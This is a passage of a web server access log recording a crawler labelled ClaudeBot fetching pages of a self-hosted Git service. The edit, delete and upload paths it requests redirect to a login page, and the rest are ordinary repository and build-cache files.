like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/TestService.csproj" -[15/Feb/2026:10:51:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit//html/README.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService/obj" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static/css" -[15/Feb/2026:10:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit//html/README.md" -[15/Feb/2026:10:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 216.73.216.188] [Length 11162] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService/obj" -[15/Feb/2026:10:51:32 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/apple-touch-icon.png" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit//.Backup/html/README.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0" -[15/Feb/2026:10:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit//.Backup/html/README.md" -[15/Feb/2026:10:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 11359] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 11189] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 11363] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/project.nuget.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/database.sqlite" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/project.nuget.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/project.nuget.cache" -[15/Feb/2026:10:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/database.sqlite" -[15/Feb/2026:10:51:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/project.nuget.cache" -[15/Feb/2026:10:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 11806] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/project.assets.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/database.sqlite" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets" -[15/Feb/2026:10:51:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets/images" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/project.assets.json" -[15/Feb/2026:10:51:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/project.assets.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/database.sqlite" -[15/Feb/2026:10:51:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcConnectionTest/obj/Debug/net8.0" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets/images" -[15/Feb/2026:10:51:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/project.assets.json" -[15/Feb/2026:10:51:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcConnectionTest/obj/Debug/net8.0" -[15/Feb/2026:10:51:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Program.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/appsettings.Development.json" -[15/Feb/2026:10:51:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Program.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/appsettings.Development.json" -[15/Feb/2026:10:51:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/services" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Program.cs" -[15/Feb/2026:10:51:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Program.cs" -[15/Feb/2026:10:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/services" -[15/Feb/2026:10:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug" [Client 216.73.216.188] [Length 10109] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0" -[15/Feb/2026:10:51:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Properties" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/js" -[15/Feb/2026:10:51:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Properties" -[15/Feb/2026:10:51:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets/css" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/css" -[15/Feb/2026:10:51:35 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/favicon.ico" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj" -[15/Feb/2026:10:51:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets/css" -[15/Feb/2026:10:51:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0" -[15/Feb/2026:10:51:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/appsettings.json" [Client 216.73.216.188] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" [Client 216.73.216.188] [Length 9867] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 10105] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" [Client 216.73.216.188] [Length 11059] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 9839] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/calculator.py" -[15/Feb/2026:10:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 216.73.216.188] [Length 12245] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 216.73.216.188] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json?display=source" [Client 216.73.216.188] [Length 11492] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html" -[15/Feb/2026:10:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 216.73.216.188] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 